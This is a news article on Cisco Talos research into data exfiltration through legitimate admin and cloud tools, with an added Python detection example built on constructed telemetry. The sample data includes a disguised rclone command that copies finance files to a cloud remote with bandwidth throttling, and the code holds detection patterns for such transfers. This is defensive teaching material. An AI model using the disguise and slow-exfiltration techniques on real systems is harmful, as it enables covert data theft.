NEWS Your cloud is their base: attackers are now quietly exfiltrating data through legitimate administration software.

pinkman

Why write malware when admin utilities will do the spying for you?

Utilities familiar to every administrator are increasingly being turned into data theft tools. Rather than relying on custom malware, attackers are adopting a far simpler approach: they take legitimate tools already present in a company's infrastructure and use them to quietly move information out.

Cisco Talos researchers described this approach in their Exfiltration Framework project. The work shows how attackers exploit native operating system capabilities, popular third-party software, and cloud clients to transfer data. This makes detection considerably harder, because traditional indicators of compromise (known-bad hashes and binaries) and blocking by tool name are largely ineffective against software the organisation itself installed.

These are not rare or exotic tools. PowerShell, robocopy, curl, rclone, Syncthing, and cloud platform clients such as the AWS CLI or AzCopy are all used for data theft. All of them are part of everyday work, so seeing them run raises no suspicion on its own.

The core problem is that attackers hide inside normal activity. Data transfer runs over standard protocols, most often HTTPS, using permitted ports and encryption. From the network's point of view, such traffic looks like a backup or synchronisation job. Even access to cloud services does not raise alarms, because companies use those same services themselves.

The Exfiltration Framework focuses on behaviour rather than on the tools themselves. The model considers how a program is launched, which process invokes it, where its traffic goes, what traces remain on the system, and how the transfer itself behaves. This approach surfaces persistent signs of abuse even when a utility has been renamed or launched from a trusted directory.

The analysis identified several characteristic techniques. One of the most common is camouflage. For example, rclone is often renamed and dropped into familiar directories to conceal data transfer to the cloud. Judged by its file name alone, the process looks like normal system activity in the logs, even though its command line and executable metadata still betray what it is.

Another technique is "slow" theft. Instead of one large upload, attackers split the data into small chunks and send them gradually. Each transfer stays under volume-based alert thresholds, so the activity can continue undetected for weeks.

Cloud behaviour poses its own challenges. Data transfer through official clients is virtually indistinguishable from legitimate work. The IP addresses and domains belong to major providers, so filtering on network characteristics alone is meaningless. What matters is context: who exactly is sending the data, where, and in what volume.

Traces left on the system also differ. Some utilities leave configuration files, logs, and cached credentials, while others record almost nothing. PowerShell scripts, for example, can run entirely in memory and leave no obvious artefacts. Because of this, defenders cannot rely on a single consistent set of artefacts.

The authors conclude that reliable detection requires correlating data from several sources at once: endpoint logs, network traffic, and cloud service information. Moreover, what matters most is not individual events but deviations from normal behaviour: unusual transfer volumes, unusual destinations, or odd launch contexts.
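The following is an added example, not code from Cisco Talos or from the original article, showing how the behavioural approach described above can be turned into detection logic: it spots a renamed rclone from its executable metadata and command grammar rather than its file name, sums small uploads over a sliding window so chunked "slow" theft becomes visible, and correlates the endpoint and network signals against a per-host baseline. The event field names, the baseline values, the thresholds and the sample telemetry are all constructed assumptions.

```python
"""Behaviour-based exfiltration detection over constructed endpoint and network events.
Added example with assumed schemas and thresholds; not the Exfiltration Framework's code."""
import re
from collections import defaultdict
from datetime import datetime, timedelta
from pathlib import PureWindowsPath

MiB = 2 ** 20
PER_FLOW_THRESHOLD = 10 * MiB  # a naive per-upload DLP threshold, kept only for contrast
# Cloud storage endpoints (suffix-matched). Abused and legitimate traffic look identical here.
CLOUD_STORAGE = {"storage.googleapis.com", "s3.amazonaws.com", "blob.core.windows.net"}
# rclone grammar: a transfer verb followed by a "remote:path" argument. Two or more
# letters are required before the colon so Windows drive letters such as D:\ do not match.
RCLONE_CMD = re.compile(r"\b(copy|copyto|sync|move|moveto)\b.*\s[A-Za-z][\w-]+:", re.I)
THROTTLE_FLAGS = re.compile(r"--bwlimit\b|--transfers\s+1\b", re.I)


def suspicious_process(ev):
    """Return why a process-creation event looks like a disguised transfer tool, or None.
    Judges PE OriginalFileName and command grammar, not the on-disk name."""
    image_name = PureWindowsPath(ev["image"]).name.lower()
    original = ev.get("original_name", "").lower()
    reasons = []
    if original and original != image_name:
        reasons.append(f"renamed binary: {image_name} carries OriginalFileName {original}")
    if RCLONE_CMD.search(ev["cmdline"]) and image_name != "rclone.exe":
        reasons.append("rclone-style command line from a non-rclone image")
    if THROTTLE_FLAGS.search(ev["cmdline"]):
        reasons.append("deliberately throttled transfer")
    return "; ".join(reasons) or None


def aggregate_egress(flows, window=timedelta(hours=24)):
    """Peak outbound bytes per (host, dst) inside any sliding window.
    Each flow may stay under a per-upload threshold; only the sum exposes slow theft."""
    by_key = defaultdict(list)
    for f in flows:
        by_key[(f["host"], f["dst"])].append((datetime.fromisoformat(f["ts"]), f["bytes_out"]))
    peaks = {}
    for key, items in by_key.items():
        items.sort()
        start = running = peak = 0
        for ts, size in items:
            running += size
            while ts - items[start][0] > window:
                running -= items[start][1]
                start += 1
            peak = max(peak, running)
        peaks[key] = peak
    return peaks


def detect(process_events, flows, baseline, ratio=5.0, floor=1 * MiB):
    """Correlate endpoint and network signals. A host that both launched a suspicious
    process and pushed far more than usual to a cloud endpoint is the high-confidence case."""
    proc_hits = defaultdict(list)
    for ev in process_events:
        why = suspicious_process(ev)
        if why:
            proc_hits[ev["host"]].append(why)
    alerts = []
    for (host, dst), total in aggregate_egress(flows).items():
        to_cloud = any(dst == d or dst.endswith("." + d) for d in CLOUD_STORAGE)
        expected = baseline.get((host, dst), 0)
        anomalous = total > max(ratio * expected, floor)  # new destination or volume spike
        if anomalous and host in proc_hits:
            sev = "high"
        elif anomalous and to_cloud:
            sev = "medium"
        else:
            continue
        alerts.append({"host": host, "dst": dst, "severity": sev,
                       "bytes_24h": total, "evidence": proc_hits.get(host, [])})
    return alerts


# --- Constructed sample telemetry (not real logs) -----------------------------------
PROCESS_EVENTS = [
    {"host": "ws-17", "user": "jdoe", "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\Temp\svchost.exe", "original_name": "rclone.exe",
     "cmdline": r"C:\Windows\Temp\svchost.exe copy D:\Finance gdrive:q3 --bwlimit 200k"},
    {"host": "bkp-01", "user": "svc_backup", "parent": r"C:\Windows\System32\svchost.exe",
     "image": r"C:\Tools\rclone\rclone.exe", "original_name": "rclone.exe",
     "cmdline": r"rclone.exe sync E:\Backups s3:corp-backups --config C:\Tools\rclone.conf"},
    {"host": "ws-17", "user": "jdoe", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\robocopy.exe", "original_name": "robocopy.exe",
     "cmdline": r"robocopy.exe D:\Finance \\fs01\finance /MIR"},
]


def _flows(host, dst, count, size, start, step):
    t0 = datetime.fromisoformat(start)
    return [{"ts": (t0 + i * step).isoformat(), "host": host, "dst": dst, "bytes_out": size}
            for i in range(count)]

# ws-17 trickles 2 MiB every 40 minutes; bkp-01 is a normal nightly backup job.
FLOWS = (_flows("ws-17", "storage.googleapis.com", 30, 2 * MiB, "2025-03-20T09:05:00", timedelta(minutes=40))
         + _flows("bkp-01", "s3.amazonaws.com", 5, 100 * MiB, "2025-03-20T01:00:00", timedelta(minutes=10)))
# Typical daily bytes per (host, dst) learned from history; ws-17 has never talked to Google storage.
BASELINE = {("bkp-01", "s3.amazonaws.com"): 480 * MiB}
```

Running `detect(PROCESS_EVENTS, FLOWS, BASELINE)` yields a single high-severity alert for ws-17: none of its thirty 2 MiB uploads crosses the 10 MiB per-flow threshold, but their 24-hour sum does, and the host also launched a binary whose OriginalFileName and command line say rclone while its path says svchost. The backup server, by contrast, moves five times as many bytes through the real rclone.exe, each upload well above the per-flow threshold, yet generates no alert because the volume matches its baseline and nothing about the launch is unusual; a purely per-upload rule would have produced the opposite result.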

Ultimately, the stealth of these attacks comes not from sophisticated technology but from the trust placed in approved tools. As long as companies treat such utilities as safe by default, attackers will keep using them as the easiest and most reliable way to exfiltrate data.